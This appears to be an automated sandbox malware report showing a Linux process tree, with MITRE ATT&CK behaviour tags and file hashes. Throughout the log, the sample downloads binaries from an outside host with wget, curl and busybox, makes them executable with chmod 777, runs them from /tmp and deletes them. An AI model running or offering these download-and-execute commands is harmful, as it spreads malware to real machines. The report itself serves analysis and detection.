- File and Directory Permissions Modification
PID:943
-
-
/tmp/tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq./tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq2⤵
- Executes dropped EXE
PID:944
-
-
/bin/rmrm tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq2⤵PID:945
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr2⤵PID:946
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:947
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr2⤵PID:949
-
-
/bin/chmodchmod 777 xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr2⤵
- File and Directory Permissions Modification
PID:950
-
-
/tmp/xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr./xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr2⤵
- Executes dropped EXE
PID:951
-
-
/bin/rmrm xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr2⤵PID:952
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ2⤵
- System Network Configuration Discovery
PID:953
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:954
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ2⤵
- System Network Configuration Discovery
PID:956
-
-
/bin/chmodchmod 777 ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ2⤵
- File and Directory Permissions Modification
PID:957
-
-
/tmp/ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ./ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ2⤵
- Executes dropped EXE
PID:958
-
-
/bin/rmrm ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ2⤵PID:959
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX2⤵
- System Network Configuration Discovery
PID:960
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:961
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX2⤵
- System Network Configuration Discovery
PID:963
-
-
/bin/chmodchmod 777 p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX2⤵
- File and Directory Permissions Modification
PID:964
-
-
/tmp/p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX./p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX2⤵
- Executes dropped EXE
PID:965
-
-
/bin/rmrm p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX2⤵PID:966
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y082⤵
- System Network Configuration Discovery
PID:967
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y082⤵
- Reads runtime system information
- Writes file to tmp directory
PID:968
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y082⤵
- System Network Configuration Discovery
PID:970
-
-
/bin/chmodchmod 777 7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y082⤵
- File and Directory Permissions Modification
PID:971
-
-
/tmp/7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y08./7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y082⤵
- Executes dropped EXE
PID:972
-
-
/bin/rmrm 7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y082⤵PID:973
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE2⤵
- System Network Configuration Discovery
PID:974
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:975
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE2⤵PID:977
-
-
/bin/chmodchmod 777 e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE2⤵
- File and Directory Permissions Modification
PID:978
-
-
/tmp/e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE./e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE2⤵
- Executes dropped EXE
PID:979
-
-
/bin/rmrm e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE2⤵PID:980
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA272⤵
- System Network Configuration Discovery
PID:981
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA272⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:982
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA272⤵
- System Network Configuration Discovery
PID:984
-
-
/bin/chmodchmod 777 upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA272⤵
- File and Directory Permissions Modification
PID:985
-
-
/tmp/upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA27./upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA272⤵
- Executes dropped EXE
PID:986
-
-
/bin/rmrm upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA272⤵PID:987
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB2⤵
- System Network Configuration Discovery
PID:988
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:989
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB2⤵
- System Network Configuration Discovery
PID:991
-
-
/bin/chmodchmod 777 kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB2⤵
- File and Directory Permissions Modification
PID:992
-
-
/tmp/kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB./kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB2⤵
- Executes dropped EXE
PID:993
-
-
/bin/rmrm kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB2⤵PID:994
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl2⤵
- System Network Configuration Discovery
PID:995
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:996
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl2⤵
- System Network Configuration Discovery
PID:998
-
-
/bin/chmodchmod 777 X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl2⤵
- File and Directory Permissions Modification
PID:999
-
-
/tmp/X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl./X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl2⤵
- Executes dropped EXE
PID:1000
-
-
/bin/rmrm X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl2⤵PID:1001
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J2⤵
- System Network Configuration Discovery
PID:1002
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1003
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J2⤵PID:1005
-
-
/bin/chmodchmod 777 7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J2⤵
- File and Directory Permissions Modification
PID:1006
-
-
/tmp/7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J./7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J2⤵
- Executes dropped EXE
PID:1007
-
-
/bin/rmrm 7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J2⤵PID:1008
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97